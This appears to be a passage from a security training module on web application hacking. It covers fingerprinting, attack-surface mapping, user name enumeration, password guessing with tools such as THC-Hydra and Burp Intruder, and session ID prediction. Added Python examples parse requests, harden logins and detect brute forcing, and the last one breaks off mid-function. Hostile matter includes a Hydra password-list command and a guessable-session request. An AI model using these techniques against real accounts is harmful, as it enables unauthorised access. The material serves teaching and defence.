[Screenshot: Burp Suite Free Edition v1.4.01, Intruder attack window. The captured request (a GET /th?id=... to ts4.mm.bing.net with a Chrome/22 User-Agent and a bing.com/images/search Referer) is shown in the positions and results tabs; the results table lists 200 and 400 responses for the attacked payload position.]
F IG U R E 1 3 .3 4 : S e rv e r I d e n t if ic a t io n /B a n n e r G ra b b in g
Web Spidering Using Mozenda Web Agent Builder
Source: http://www.mozenda.com
Mozenda Web Agent Builder is a Windows application used to build your data extraction project. It crawls through a website and harvests pages of information. Web Agent Builder is a tool suite that includes an intuitive UI and a browser-based instruction set. Setting up your crawler is as simple as pointing and clicking to navigate pages and capture the information you want.
[Screenshot of Mozenda Web Agent Builder: an agent that captures item name, price, rating and model from a product listing, then review rating, review text and "would recommend" from each item's reviews]
FIGURE 13.35: Web Spidering Using Mozenda Web Agent Builder
[Methodology diagram: Attack Web Servers, Attack Authentication Mechanism, Attack Session Management Mechanism, Attack Data Connectivity, Attack Web Services]
Web App Hacking Methodology
Attack Web Servers
Once you conduct full-scope footprinting of the web infrastructure, analyze the gathered information to find the vulnerabilities that can be exploited to launch attacks on web servers. Then attempt to attack the web servers using the various techniques available. Each and every website or web application is associated with a web server that hosts the code serving the website or web application. The attacker exploits the vulnerabilities in that code and launches attacks on the web server. Detailed information about hacking web servers is explained on the following slides.
Hacking Web Servers
Once the attacker identifies the web server environment, he or she scans for known vulnerabilities by using a web server vulnerability scanner. Vulnerability scanning helps the attacker launch the attack easily by identifying the exploitable vulnerabilities present on the web server. Once the attacker gathers all the potential vulnerabilities, he or she tries to exploit them with the help of various attack techniques to compromise the web server. In order to stop the web server from serving legitimate users or clients, the attacker launches a DoS attack against the web server. You can launch attacks on the vulnerable web server with the help of tools such as UrlScan, Nikto, Nessus, Acunetix Web Vulnerability Scanner, WebInspect, etc.
Web Server Hacking Tool: WebInspect
- WebInspect identifies security vulnerabilities in the web applications
- It runs interactive scans using a sophisticated user interface
- Attacker can exploit identified vulnerabilities to carry out web services attacks
https://download.hpsmartupdate.com
Web Server Hacking Tool: WebInspect
Source: https://download.hpsmartupdate.com
WebInspect is web application security assessment software designed to thoroughly analyze today's complex web applications. It delivers fast scanning capabilities, broad assessment coverage, and accurate web application scanning results. It identifies security vulnerabilities that are undetectable by traditional scanners. Attackers can exploit the identified vulnerabilities to launch web services attacks.
[Screenshot of the WebInspect scan interface]
FIGURE 13.36: WebInspect Tool Screenshot
[Methodology diagram: Attack Web Servers, Attack Authentication Mechanism, Attack Session Management Mechanism, Attack Data Connectivity, Attack Web Services]
Web App Hacking Methodology
Analyze Web Applications
Analyzing the web application helps you identify the different vulnerable points that an attacker can exploit to compromise the web application. Detailed information about analyzing a web application and identifying the entry points used to break into it is discussed on the following slides.
Analyze Web Applications
Analyze the active application's functionality and technologies in order to identify the attack surfaces that it exposes:
- Identify Entry Points for User Input: review the generated HTTP request to identify the input entry points
- Identify Server-Side Technologies: fingerprint the technologies active on the server using various fingerprint techniques such as HTTP fingerprinting
- Identify Server-Side Functionality: observe the applications revealed to the client to identify the server-side structure and functionality
- Map the Attack Surface: identify the various attack surfaces uncovered by the applications and the vulnerabilities that are associated with each one
Analyze Web Applications
Web applications have various vulnerabilities. First, the attacker has to acquire basic knowledge of the web application, and then analyze the active application's functionality and technologies in order to identify the attack surfaces that it exposes.
Identify Entry Points for User Input
The entry points of an application also serve as entry points for attacks; these entry points include the front-end web application that listens for HTTP requests. Review the generated HTTP request to identify the user input entry points.
Identify Server-side Functionality
Server-side functionality refers to the ability of a server to execute programs that produce output web pages. These are scripts that reside on particular web servers and allow interactive web pages or websites to run there. Observe the applications revealed to the client to identify the server-side structure and functionality.
Identify Server-side Technologies
Server-side technologies, or server-side scripting, refers to the dynamic generation of web pages served by web servers, as opposed to static web pages that are kept in the server's storage and served to web browsers. Fingerprint the technologies active on the server using various fingerprint techniques such as HTTP fingerprinting.
Map the Attack Surface
Identify the various attack surfaces uncovered by the applications and the vulnerabilities that are associated with each one.
Analyze Web Applications: Identify Entry Points for User Input
- Examine URL, HTTP header, query string parameters, POST data, and cookies to determine all user input fields
- Identify HTTP header parameters that can be processed by the application as user inputs such as User-Agent, Referer, Accept, Accept-Language, and Host headers
- Determine URL encoding techniques and other encryption measures implemented to secure the web traffic such as SSL
Tools used: Burp Suite, HttPrint, WebScarab, OWASP Zed Attack Proxy
Analyze Web Applications: Identify Entry Points for User Input
- During the web application analysis, attackers identify entry points for user input so that they can understand the way the web application accepts or handles the user input. Then the attacker tries to find the vulnerabilities present in the input mechanism and tries to exploit them so that the attacker can interact with or gain access to the web application. Examine URL, HTTP header, query string parameters, POST data, and cookies to determine all user input fields.
- Identify HTTP header parameters that can be processed by the application as user inputs such as User-Agent, Referer, Accept, Accept-Language, and Host headers.
- Determine URL encoding techniques and other encryption measures implemented to secure the web traffic such as SSL.
The tools used to analyze web applications to identify entry points for user input include Burp Suite, HttPrint, WebScarab, OWASP Zed Attack Proxy, etc.
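The following Python function, added here as an example (not Burp's, WebScarab's or ZAP's code), enumerates the entry points the text lists from one captured request: URL path, query string, POST body, cookies, and the headers named above; the request, hostname and parameter names are constructed.

```python
"""List user-controlled entry points in a raw HTTP/1.1 request."""
from urllib.parse import urlsplit, parse_qsl

# Headers the application may read as input, as listed in the text above.
INPUT_HEADERS = {"user-agent", "referer", "accept", "accept-language", "host"}

# Constructed sample request (hostname and values are assumptions).
RAW_REQUEST = (
    "POST /customers.aspx?name=existing%20clients&showBy=name HTTP/1.1\r\n"
    "Host: www.juggyboy.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Referer: https://www.juggyboy.com/\r\n"
    "Accept-Language: en-US,en;q=0.8\r\n"
    "Cookie: ASP.NET_SessionId=abc123; theme=dark\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 24\r\n"
    "\r\n"
    "isActive=0&comment=hello"
)


def parse_request(raw):
    """Split a raw request into (method, target, {lowercased header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def entry_points(raw):
    """Return {source: [field names]} for every place user input can enter.
    Each name is a candidate for later input-handling tests."""
    method, target, headers, body = parse_request(raw)
    parts = urlsplit(target)
    found = {
        "url_path": [parts.path],
        "query": [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)],
        "post": [],
        "cookie": [],
        "header": sorted(h for h in headers if h in INPUT_HEADERS),
    }
    # Only form-encoded bodies are split into fields here; other content
    # types (JSON, XML, multipart) would need their own parser.
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        found["post"] = [k for k, _ in parse_qsl(body, keep_blank_values=True)]
    cookie_header = headers.get("cookie", "")
    found["cookie"] = [c.split("=", 1)[0].strip()
                       for c in cookie_header.split(";") if c.strip()]
    return found


def count_entry_points(raw):
    """Total number of distinct input fields an analyst has to cover."""
    return sum(len(v) for v in entry_points(raw).values())


if __name__ == "__main__":
    for source, names in entry_points(RAW_REQUEST).items():
        print(f"{source:8s} {names}")
    print("total:", count_entry_points(RAW_REQUEST))
```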
Analyze Web Applications: Identify Server-Side Technologies
- Perform a detailed server fingerprinting, analyze HTTP headers and HTML source code to identify server-side technologies
- Examine URLs for file extensions, directories, and other identification information
- Examine the error page messages
- Examine session tokens: JSESSIONID (Java), ASPSESSIONID (IIS server), ASP.NET_SessionId (ASP.NET), PHPSESSID (PHP)
[Slide figure: an error page at http://juggyboy.com/error.aspx reading "Server Error in '/ReportServer' Application. Could not find the permission set named 'ASP.Net'. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Version Information: Microsoft .NET Framework Version 4.0.30319; ASP.NET Version 4.0.30319.1", next to a list of Server banners such as Microsoft-IIS/6.0, SunONE Webserver 6.0, Netscape-Enterprise/4.1 and Apache/2.0.52 (Fedora)]
Analyze Web Applications: Identify Server-Side Technologies
Source: http://net-square.com
After identifying the entry points through user inputs, attackers try to identify server-side technologies.
The server-side technologies can be identified as follows:
1. Perform a detailed server fingerprinting, analyze HTTP headers and HTML source code to identify server-side technologies
2. Examine URLs for file extensions, directories, and other identification information
3. Examine the error page messages
4. Examine session tokens:
   - JSESSIONID - Java
   - ASPSESSIONID - IIS server
   - ASP.NET_SessionId - ASP.NET
   - PHPSESSID - PHP
[Figure: the juggyboy.com/error.aspx error page ("Server Error in '/ReportServer' Application. Could not find the permission set named 'ASP.Net'. Description: An unhandled exception occurred during the execution of the current web request ... Version Information: Microsoft .NET Framework Version 4.0.30319; ASP.NET Version 4.0.30319.1"), and a web server fingerprinting report with columns host, port, banner reported and banner deduced, in which several hosts' reported banners (e.g. Microsoft-IIS/6.0.0, WebSTAR, JPMC1.0) differ from the deduced server (e.g. Apache/2.0.x, SunONE Webserver 6.0/Netscape-Enterprise/4.1); one row announces "Yes we are using ServerMask!"]
FIGURE 13.37: Identify Server-Side Technologies
Analyze Web Applications: Identify Server-Side Functionality
Examine page source and URLs and make an educated guess to determine the internal structure and functionality of web applications
Tools used: GNU Wget (http://www.gnu.org), Teleport Pro (http://www.tenmax.com), BlackWidow (http://softbytelabs.com)
Examine URL: https://www.juggyboy.com/customers.aspx?name=existing%20clients&isActive=0&startDate=20%2F11%2F2010&endDate=20%2F05%2F2011&showBy=name (annotated: "https" - SSL; ".aspx" - ASPX platform)
Analyze Web Applications: Identify Server-side Functionality
Once the server-side technologies are determined, identify the server-side functionality. This helps you find the potential vulnerabilities in server-side functionality. Examine page source and URLs and make an educated guess to determine the internal structure and functionality of web applications.
Tools Used:
Wget
Source: http://www.gnu.org
GNU Wget is for retrieving files using HTTP, HTTPS, and FTP, the most widely-used Internet protocols. It is a non-interactive command-line tool, so it can be called from scripts, cron jobs, terminals without X-Windows support, etc.
Teleport Pro
Source: http://www.tenmax.com
Teleport Pro is an all-purpose high-speed tool for getting data from the Internet. Launch up to ten simultaneous retrieval threads, access password-protected sites, filter files by size and type, and search for keywords. Capable of reading HTML 4.0, CSS 2.0, and DHTML, Teleport can find all files available on all websites by means of web spidering with server-side image map exploration, automatic dial-up connecting, Java applet support, variable exploration depths, project scheduling, and relinking abilities.
BlackWidow
Source: http://softbytelabs.com
BlackWidow scans a site and creates a complete profile of the site's structure, files, external links and even link errors. BlackWidow will download all file types such as pictures and images, audio and MP3, videos, documents, ZIP, programs, CSS, Macromedia Flash, .pdf, PHP, CGI, HTM to MIME types from any websites. Download video and save as many different video formats, such as YouTube, MySpace, Google, MKV, MPEG, AVI, DivX, XviD, MP4, 3GP, WMV, ASF, MOV, QT, VOB, etc. It can now be controlled programmatically using the built-in Script Interpreter.
Examine URL: https://www.juggyboy.com/customers.aspx?name=existing%20clients&isActive=0&startDate=20%2F11%2F2010&endDate=20%2F05%2F2011&showBy=name
(annotated: "https" - SSL; ".aspx" - ASPX platform; "showBy=name" - database column)
FIGURE 13.38: BlackWidow
If a page URL starts with https instead of http, then it is known as an SSL-certified page. If a page contains an .aspx extension, chances are that the application is written using ASP.NET. If the query string has a parameter named showBy, then you can assume that the application is using a database and displays the data by that value.
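Added example (not net-square's, httprint's or BlackWidow's code) that applies the clues from the server-side technology passage and the URL passage above to one constructed response: session token names, Server and X-Powered-By headers, the URL scheme and extension, the showBy parameter, and the error-page version string; it also flags a Server banner that contradicts the other clues, the pattern a banner-masking product produces. The sample headers, body and the banner_mismatch rule are assumptions.

```python
"""Infer server-side technology from URL, headers and error-page clues."""
import re
from urllib.parse import urlsplit, parse_qs

SESSION_TOKENS = {              # cookie name -> platform, as listed in the text
    "JSESSIONID": "Java servlet container",
    "ASPSESSIONID": "Classic ASP on IIS",
    "ASP.NET_SessionId": "ASP.NET",
    "PHPSESSID": "PHP",
}
EXTENSIONS = {".aspx": "ASP.NET", ".asp": "Classic ASP", ".php": "PHP",
              ".jsp": "Java (JSP)"}

# Constructed inputs: the URL reuses the juggyboy example from the figure;
# the response headers and body are assumptions modelled on the slide.
SAMPLE_URL = ("https://www.juggyboy.com/customers.aspx?name=existing%20clients"
              "&isActive=0&startDate=20%2F11%2F2010&endDate=20%2F05%2F2011&showBy=name")
SAMPLE_HEADERS = [
    ("Server", "Microsoft-IIS/6.0"),
    ("X-Powered-By", "ASP.NET"),
    ("Set-Cookie", "ASP.NET_SessionId=x7q9; path=/; HttpOnly"),
]
SAMPLE_BODY = ("Server Error in '/ReportServer' Application. "
               "Version Information: Microsoft .NET Framework Version 4.0.30319; "
               "ASP.NET Version 4.0.30319.1")


def fingerprint(url, headers, body):
    """Return a list of (clue, inference) pairs; an empty list means no clue."""
    clues = []
    parts = urlsplit(url)
    if parts.scheme == "https":
        clues.append(("https scheme", "TLS/SSL in use"))
    m = re.search(r"(\.[a-z0-9]+)$", parts.path, re.I)
    if m and m.group(1).lower() in EXTENSIONS:
        clues.append((f"extension {m.group(1)}", EXTENSIONS[m.group(1).lower()]))
    if "showBy" in parse_qs(parts.query):
        clues.append(("showBy parameter",
                      "database-backed listing; value may name a column"))
    for name, value in headers:
        lname = name.lower()
        if lname == "server":
            clues.append((f"Server: {value}", value))
        elif lname == "x-powered-by":
            clues.append((f"X-Powered-By: {value}", value))
        elif lname == "set-cookie":
            cookie = value.split("=", 1)[0].strip()
            if cookie in SESSION_TOKENS:
                clues.append((f"session cookie {cookie}", SESSION_TOKENS[cookie]))
    m = re.search(r"ASP\.NET Version ([\d.]+)", body)
    if m:
        clues.append(("error page version string", f"ASP.NET {m.group(1)}"))
    return clues


def banner_mismatch(clues):
    """True when the Server banner names Apache but cookies, extensions or
    error pages say ASP/ASP.NET. (Rule is an assumption; the httprint report in
    the figure shows the same reported-vs-deduced disagreement.)"""
    banner = next((v for c, v in clues if c.startswith("Server:")), "")
    platforms = {v for c, v in clues
                 if not c.startswith(("Server:", "X-Powered-By:"))}
    asp = any(p.startswith(("ASP.NET", "Classic ASP")) for p in platforms)
    return "apache" in banner.lower() and asp


if __name__ == "__main__":
    found = fingerprint(SAMPLE_URL, SAMPLE_HEADERS, SAMPLE_BODY)
    for clue, inference in found:
        print(f"{clue:40s} -> {inference}")
    print("banner mismatch:", banner_mismatch(found))
```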
Analyze Web Applications: Map the Attack Surface
Information                   | Attack                                     | Information             | Attack
Client-Side Validation        | Injection Attack, Authentication Attack    | Injection Attack        | Privilege Escalation, Access Controls
Database Interaction          | SQL Injection, Data Leakage                | Cleartext Communication | Data Theft, Session Hijacking
File Upload and Download      | Directory Traversal                        | Error Message           | Information Leakage
Display of User-Supplied Data | Cross-Site Scripting                       | Email Interaction       | Email Injection
Dynamic Redirects             | Redirection, Header Injection              | Application Codes       | Buffer Overflows
Login                         | Username Enumeration, Password Brute-Force | Third-Party Application | Known Vulnerabilities Exploitation
Session State                 | Session Hijacking, Session Fixation        | Web Server Software     | Known Vulnerabilities Exploitation
A n a l y z e W e b A p p l i c a t i o n s : M a p t h e A t t a c k S u r f a c e
There are various e n try points fo r attackers to c o m p ro m is e th e n e tw o rk , so p ro p e r
analysis o f th e attack surface m ust be done. The m ap pin g o f th e attack surface includes
th o ro u g h checking o f possible v u ln e ra b ilitie s to launch th e attack. The fo llo w in g are th e
various factors th ro u g h w hich an atta cker collects th e in fo rm a tio n and plans th e kind o f attack
to be launched.
[Figure: the same Information/Attack table as on the slide]
FIGURE 13.39: Map the Attack Surface
[Methodology diagram: Attack Web Servers, Attack Authentication Mechanism, Attack Session Management Mechanism, Attack Data Connectivity, Attack Web Services]
Web App Hacking Methodology
Attack Authentication Mechanism
In web applications, the authentication functionality has many design loopholes such as bad passwords, i.e. short or blank, common dictionary words or names, passwords set the same as the user name, and those still set to default values. The attacker can exploit the vulnerabilities in the authentication mechanism to gain access to the web application or network. The various threats that exploit the weaknesses in the authentication mechanism include network eavesdropping, brute force attacks, dictionary attacks, cookie replay attacks, credential theft, etc.
Attack Authentication Mechanism
Most of the authentication mechanisms used by web applications have design flaws. If an attacker can identify those design flaws, he or she can easily exploit them and gain unauthorized access. The design flaws include failing to check password strength, insecure transportation of credentials over the Internet, etc. Web applications usually authenticate their clients or users based on a combination of user name and password. Hence, the authentication mechanism attack involves identifying and exploiting the user names and passwords.
User Name Enumeration
User names can be enumerated in two ways: one is verbose failure messages and the other is predictable user names.
Verbose Failure Message
In a typical login system, the user is required to enter two pieces of information, that is, user name and password. In some cases, an application will ask for some more information. If the user tries to log in and fails, then it can be inferred that at least one of the pieces of information provided by the user is incorrect or inconsistent with the other information provided. If the application discloses which particular piece of information provided by the user was incorrect or inconsistent, it provides grounds for an attacker to exploit the application.
Example:
- Account <username> not found
- The password provided is incorrect
- Account <username> has been locked out
Predictable User Names
Some applications automatically generate account user names according to some predictable sequence. This makes it very easy for an attacker who can discern the sequence to obtain a potentially exhaustive list of all valid user names.
Password Attacks
Passwords are cracked based on:
- Password functionality exploits
- Password guessing
- Brute-force attacks
Session Attacks
The following are the types of session attacks employed by the attacker to attack the authentication mechanism:
- Session prediction
- Session brute-forcing
- Session poisoning
Cookie Exploitation
The following are the types of cookie exploitation attacks:
- Cookie poisoning
- Cookie sniffing
- Cookie replay
User Name Enumeration
If the login error states which part of the user name and password is not correct, guess the users of the application using the trial-and-error method
Note: User name enumeration from verbose error messages will fail if the application implements an account lockout policy, i.e., locks the account after a certain number of failed login attempts
User Name Enumeration
Source: https://wordpress.com
User name enumeration helps in guessing login IDs and passwords of users. If the login error states which part of the user name and password is not correct, guess the users of the application using the trial-and-error method.
Look at the following picture, which shows enumerating user names from verbose failure messages:
[Figure: two WordPress.com login screens. Submitting the user name "rinimatthews" returns "ERROR: The password you entered for the email or username rinimatthews is incorrect. Lost your password?", while submitting "rini.matthews" returns "ERROR: Invalid email or username. Lost your password?". Username rini.matthews does not exist; username successfully enumerated to rinimatthews.]
FIGURE 13.40: User Name Enumeration
Note: User name enumeration from verbose error messages will fail if the application implements an account lockout policy, i.e., locks the account after a certain number of failed login attempts.
Some applications automatically generate account user names based on a sequence (such as user101, user102, etc.), and attackers can determine the sequence and enumerate valid user names.
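The defensive counterpart of the enumeration described above, as an added Python example that is not part of the module: a login check that returns the same error text whichever half was wrong, does the same hashing work for unknown names, and applies the account lockout policy the note mentions. The user store, salts and threshold are constructed for the demo.

```python
import hashlib
import hmac

# Demo user store (constructed for this example, not a real application's data):
# username -> (salt, PBKDF2-HMAC-SHA256 hash of the password).
ITERATIONS = 50_000          # lowered from production values to keep the demo fast
DUMMY_SALT = b"demo-salt-0123456"
RINI_SALT = b"salt-rini-0000000"


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


USERS = {
    "rinimatthews": (RINI_SALT, _hash_password("correct horse", RINI_SALT)),
}

# Failed-attempt counters keyed by the submitted name. Counting unknown names as well means
# a locked-out response never reveals whether the name exists. (Locking by account name is
# the policy the module describes; it also lets a remote party lock out real users, so
# production systems usually pair it with per-source throttling.)
FAILED_ATTEMPTS = {}
LOCKOUT_THRESHOLD = 5
GENERIC_ERROR = "ERROR: Invalid username or password."


def login_verbose(username: str, password: str) -> str:
    """Vulnerable form (the WordPress behaviour in the figure): the error text
    tells the caller which half was wrong, so unknown and known names differ."""
    if username not in USERS:
        return "ERROR: Invalid email or username."
    salt, stored = USERS[username]
    if _hash_password(password, salt) != stored:
        return f"ERROR: The password you entered for the username {username} is incorrect."
    return "OK"


def login_uniform(username: str, password: str) -> str:
    """Hardened form: one message for every failure, equal work for unknown names, lockout."""
    if FAILED_ATTEMPTS.get(username, 0) >= LOCKOUT_THRESHOLD:
        return GENERIC_ERROR                      # locked: same text as any other failure
    salt, stored = USERS.get(username, (DUMMY_SALT, None))
    candidate = _hash_password(password, salt)    # always hash, so response time does not leak
    ok = stored is not None and hmac.compare_digest(candidate, stored)
    if not ok:
        FAILED_ATTEMPTS[username] = FAILED_ATTEMPTS.get(username, 0) + 1
        return GENERIC_ERROR
    FAILED_ATTEMPTS.pop(username, None)           # successful login resets the counter
    return "OK"


def is_locked(username: str) -> bool:
    return FAILED_ATTEMPTS.get(username, 0) >= LOCKOUT_THRESHOLD


if __name__ == "__main__":
    # The verbose variant answers differently for an unknown and a known name;
    # the uniform variant gives the same answer for both.
    print(login_verbose("rini.matthews", "x"))
    print(login_verbose("rinimatthews", "x"))
    print(login_uniform("rini.matthews", "x"), login_uniform("rinimatthews", "x"))
```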
Password Attacks: Password Functionality Exploits
- Determine password change functionality within the application by spidering the application or creating a login account.
- Try random strings for 'Old Password', 'New Password', and 'Confirm the New Password' fields and analyze errors to identify vulnerabilities in password change functionality.
- 'Forgot Password' features generally present a challenge to the user; if the number of attempts is not limited, the attacker can guess the challenge answer successfully with the help of social engineering.
- Applications may also send a unique recovery URL or existing password to an email address specified by the attacker if the challenge is solved.
- "Remember Me" functions are implemented using a simple persistent cookie, such as RememberUser=jason, or a persistent session identifier such as RememberUser=ABY112010.
- Attackers can use an enumerated user name or predict the session identifier to bypass authentication mechanisms.
Password Attacks: Password Functionality Exploits
Password attacks are the techniques used by the attacker for discovering passwords. Attackers exploit the password functionality so that they can bypass the authentication mechanism.

Password Changing
Determine password change functionality within the application by spidering the application or creating a login account. Try random strings for Old Password, New Password, and Confirm the New Password fields and analyze errors to identify vulnerabilities in password change functionality.

Password Recovery
Forgot Password features generally present a challenge to the user; if the number of attempts is not limited, attackers can guess the challenge answer successfully with the help of social engineering. Applications may also send a unique recovery URL or existing password to an email address specified by the attacker if the challenge is solved.

Remember Me Exploit
Remember Me functions are implemented using a simple persistent cookie, such as RememberUser=jason, or a persistent session identifier such as RememberUser=ABY112010.
Attackers can use an enumerated user name or predict the session identifier to bypass authentication mechanisms.
Password Attacks: Password Guessing
- Tools: Password guessing can be performed manually or using automated tools such as Brutus, THC-Hydra, etc.
- Password Dictionary: Attackers can create a dictionary of all possible passwords using tools such as Dictionary Maker to perform dictionary attacks.
- Password List: Attackers create a list of possible passwords using most commonly used passwords, footprinting the target and social engineering techniques, and try each password until the correct password is discovered.
Password Attacks: Password Guessing
Password guessing is a method where an attacker guesses various passwords until he or she gets the correct passwords by using the following methods: password list, password dictionary, and various tools.

Password List
Attackers create a list of possible passwords using most commonly used passwords, footprinting the target and social engineering techniques, and try each password until the correct password is discovered.

Password Dictionary
Attackers can create a dictionary of all possible passwords using tools such as Dictionary Maker to perform dictionary attacks.

Tools Used for Password Guessing
Password guessing can be performed manually or using automated tools such as WebCracker, Brutus, Burp Insider, THC-Hydra, etc.

THC-Hydra
Source: http://www.thc.org
THC-Hydra is a network logon cracker that supports many different services. This tool is proof-of-concept code, written to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized remote access to a system.
[Figure: Hydra GTK front end. The Target, Passwords, Tuning, Specific and Start tabs are set to a single user name with a password list (/tmp/passlist.txt) and the "try login as password" and "try empty password" options enabled; the output pane shows 32 tasks and 45380 login tries against the FTP service on port 21 of 127.0.0.1, a rate of roughly 14000 tries per minute, and a found login. The equivalent command line shown is "hydra 127.0.0.1 ftp -l testuser -P /tmp/passlist.txt -e ns".]
FIGURE 13.41: THC-Hydra Tool Screenshot
In addition to these tools, Burp Insider is also used for password guessing.
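What the tool output above looks like from the server side, as an added Python example that is not part of the module: a detector run over a constructed authentication log that flags the three signatures of guessing (a burst of failures from one address, one address cycling through many user names, and a success that follows a burst of failures). The log format, addresses and thresholds are assumptions made for the demo.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# One-line-per-attempt authentication log in a constructed format (not a real product's log):
#   <ISO-8601 UTC timestamp> src=<client address> user=<login name> result=OK|FAIL
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$"
)


def parse_line(line: str):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "src": m["src"],
        "user": m["user"],
        "result": m["result"],
    }


def detect_guessing(lines, window=timedelta(seconds=60), fail_threshold=10, spray_threshold=5):
    """Return sorted (alert, src) pairs for sources whose failures inside `window` look like
    a password-list run (many failures), a spray (many distinct user names), or a guess
    that finally worked (a success right after a burst of failures)."""
    recent = defaultdict(deque)   # src -> deque of (timestamp, user) failures inside the window
    alerts = set()
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue                       # unparseable line: skip rather than crash the detector
        q = recent[ev["src"]]
        while q and ev["ts"] - q[0][0] > window:
            q.popleft()                    # expire failures older than the window
        if ev["result"] == "OK":
            if len(q) >= fail_threshold:
                alerts.add(("success-after-failures", ev["src"]))
            continue
        q.append((ev["ts"], ev["user"]))
        if len(q) >= fail_threshold:
            alerts.add(("brute-force", ev["src"]))
        if len({u for _, u in q}) >= spray_threshold:
            alerts.add(("password-spray", ev["src"]))
    return sorted(alerts)


# Constructed sample log: a password-list run against "marc" from one address that ends in a
# success, a spray over several accounts from a second address, and two ordinary attempts
# ten minutes apart from a third.
_BASE = datetime(2012, 9, 14, 10, 0, 0)


def _line(offset_s, src, user, result):
    stamp = (_BASE + timedelta(seconds=offset_s)).strftime("%Y-%m-%dT%H:%M:%SZ")
    return f"{stamp} src={src} user={user} result={result}"


SAMPLE_LOG = (
    [_line(i * 2, "198.51.100.7", "marc", "FAIL") for i in range(12)]
    + [_line(30, "198.51.100.7", "marc", "OK")]
    + [_line(5 + i * 8, "203.0.113.9", f"user10{i}", "FAIL") for i in range(6)]
    + [_line(0, "192.0.2.5", "alice", "FAIL"), _line(600, "192.0.2.5", "alice", "OK")]
)

if __name__ == "__main__":
    for alert in detect_guessing(SAMPLE_LOG):
        print(alert)
```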
Password Attacks: Brute-forcing
Password Attacks: Brute Forcing
Brute force is one of the methods used for cracking passwords. In a brute forcing attack, attackers crack the login passwords by trying all possible values from a set of alphabetic, numeric, and special characters. The main limitation of the brute force attack is that it is only practical for short passwords, such as those of two characters. Guessing becomes much harder when the password is longer and also if it contains letters in both upper and lower case. If numbers and symbols are used, then it might even take more than a few years to guess the password, which is practically impossible. Password cracking tools commonly used by attackers include Burp Suite's Intruder, Brutus, Sensepost's Crowbar, etc.

Burp Suite's Intruder
Source: http://portswigger.net
Burp Intruder is a module of Burp Suite. It enables the user to automate pentesting on web applications.
[Figure: Burp Suite free edition v1.4.01, Intruder "payloads" tab. Payload set 1 uses the "brute forcer" payload type with the character set abcdefghijklmnopqrstuvwxyz0123456789, giving 1,679,616 payloads and 8,398,080 requests; the payload processing rules include "to uppercase".]
FIGURE 13.42: Burp Suite's Intruder Tool Screenshot
Brutus
Source: http://www.hoobie.net
Brutus is a remote password cracking tool. Brutus supports HTTP, POP3, FTP, SMB, Telnet, IMAP, NNTP, and many other authentication types. It includes a multi-stage authentication engine and can make 60 simultaneous target connections.
[Figure: Brutus AET2 (www.hoobie.net/brutus, January 2000) configured for HTTP (Basic Auth) against target 127.0.0.1 with a user file (users.txt, 6 users) and a word list (words.txt, 818 passwords), for a maximum of 4908 authentication attempts; the "Positive Authentication Results" pane lists the user names found.]
FIGURE 13.43: Brutus Tool Screenshot
Session Attacks: Session ID Prediction/Brute Forcing
Every time a user logs in to a particular website, a session ID is given to the user. This session ID is valid until the session is terminated, and a new session ID is provided when the user logs in again. Attackers try to exploit this session ID mechanism by guessing the next session ID after collecting some valid session IDs.
- In the first step, the attacker collects some valid session ID values by sniffing traffic from authenticated users.
- Attackers then analyze captured session IDs to determine the session ID generation process, such as the structure of the session ID, the information that is used to create it, and the encryption or hash algorithm used by the application to protect it.
- In addition, the attacker can implement a brute force technique to generate and test different values of the session ID until he or she successfully gets access to the application.
- Vulnerable session generation mechanisms that use session IDs composed of the user name or other predictable information, like a timestamp or client IP address, can be exploited by easily guessing valid session IDs.
GET http://janaina:8180/WebGoat/attack?Screen=17&menu=410 HTTP/1.1
Host: janaina:8180
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Referer: http://janaina:8180/WebGoat/attack?Screen=17&menu=410
Cookie: JSESSIONID=user01
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
FIGURE 13.44: Session ID Prediction/Brute Forcing
For certain web applications, the session ID information is usually composed of a string of fixed width. Randomness is essential in order to avoid prediction. From the diagram you can see that the session ID variable is indicated by JSESSIONID and that its value is "user01", which corresponds to the user name. By guessing a new value for it, say "user02", it is possible for the attacker to gain unauthorized access to the application.
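The analysis steps above turned around for a defender, as an added Python example that is not part of the module: a check that takes a sample of captured session IDs (the WebGoat-style user01, user02 values from the figure, or an application's real ones) and reports fixed-width, entropy, counter and embedded-user-name weaknesses, next to a generator that avoids all of them. The 64-bit entropy floor follows OWASP's session management guidance; the finding names are this example's own.

```python
import math
import re
import secrets

MIN_ENTROPY_BITS = 64   # OWASP session management guidance: at least 64 bits of effective entropy


def new_session_id() -> str:
    """32 bytes from the OS CSPRNG, URL-safe base64 encoded: 256 bits, unrelated to the user."""
    return secrets.token_urlsafe(32)


def assess_session_ids(ids, known_usernames=()):
    """Apply the attacker's analysis steps defensively to a sample of captured IDs and
    return the weaknesses found (an empty list means nothing was flagged)."""
    ids = list(ids)
    if not ids:
        raise ValueError("need at least one session ID")
    findings = []
    if len({len(i) for i in ids}) != 1:
        findings.append("variable-width")
    # Entropy upper bound: the alphabet actually observed, raised to the shortest ID length.
    alphabet = set("".join(ids))
    shortest = min(len(i) for i in ids)
    est_bits = shortest * math.log2(len(alphabet)) if len(alphabet) > 1 else 0.0
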